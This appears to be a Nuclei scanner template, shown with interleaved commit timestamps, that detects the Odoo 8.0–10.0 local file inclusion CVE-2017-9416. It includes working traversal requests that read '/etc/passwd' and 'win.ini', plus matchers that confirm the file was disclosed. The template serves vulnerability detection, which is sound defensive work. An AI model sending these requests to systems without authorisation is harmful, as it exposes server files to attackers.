nuclei-templates/http/cves/2017/CVE-2017-9416.yaml

54 lines
1.7 KiB
YAML
Raw Normal View History

2023-03-24 13:22:55 +00:00
id: CVE-2017-9416
info:
name: Odoo 8.0/9.0/10.0 - Local File Inclusion
2023-03-24 13:22:55 +00:00
author: Co5mos
severity: medium
description: |
Odoo 8.0, 9.0, and 10.0 are susceptible to local file inclusion via tools.file_open. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2023-09-27 15:51:13 +00:00
impact: |
Allows an attacker to read arbitrary files on the server.
2023-09-06 13:22:34 +00:00
remediation: |
Upgrade to a patched version of Odoo or apply the necessary security patches.
2023-03-24 13:22:55 +00:00
reference:
- https://github.com/odoo/odoo/issues/17394
- https://nvd.nist.gov/vuln/detail/CVE-2017-9416
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2017-9416
cwe-id: CWE-22
2023-08-31 11:46:18 +00:00
epss-score: 0.01037
epss-percentile: 0.83585
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:*
2023-03-28 12:22:50 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 13:22:34 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: odoo
product: odoo
2024-01-14 09:21:50 +00:00
tags: cve2017,cve,odoo,lfi
2023-03-24 13:22:55 +00:00
http:
2023-03-24 13:22:55 +00:00
- method: GET
path:
2023-03-25 17:38:14 +00:00
- "{{BaseURL}}/base_import/static/c:/windows/win.ini"
- "{{BaseURL}}/base_import/static/etc/passwd"
2023-03-24 13:22:55 +00:00
stop-at-first-match: true
2023-07-11 19:49:27 +00:00
2023-03-24 13:22:55 +00:00
matchers-condition: or
matchers:
- type: dsl
dsl:
- "regex('root:.*:0:0:', body)"
- "status_code == 200"
condition: and
- type: dsl
dsl:
- "contains(body, 'bit app support')"
- "contains(body, 'fonts')"
- "contains(body, 'extensions')"
- "status_code == 200"
condition: and
# digest: 4a0a00473045022100eeb180faf838b4927b92bf8517268ab8712df323d040cc7f15dbb2aa4ab9062e02202242d7b85aaddb683b6a9c5637ecaf2c10d6770fa42f98931746defb95e70d7f:922c64590222798bb761d5b6d8e72950